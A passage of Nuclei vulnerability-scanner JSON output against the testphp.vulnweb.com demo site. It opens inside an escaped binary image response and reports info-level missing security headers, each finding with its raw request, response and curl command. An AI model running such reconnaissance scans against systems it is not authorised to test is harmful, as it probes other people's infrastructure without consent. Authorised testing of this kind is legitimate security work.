u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.180594702Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/hpp\",\"path\":\"/hpp\",\"matched-at\":\"http://testphp.vulnweb.com/hpp/\",\"request\":\"GET /hpp HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003ctitle\\u003eHTTP Parameter Pollution Example\\u003c/title\\u003e\\r\\n\\r\\n\\u003ca href=\\\"?pp=12\\\"\\u003echeck\\u003c/a\\u003e\\u003cbr/\\u003e\\r\\n\\r\\n\\u003chr\\u003e\\r\\n\\u003ca href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'\\u003eOriginal article\\u003c/a\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.339603699Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.339622237Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:57.499745905Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can 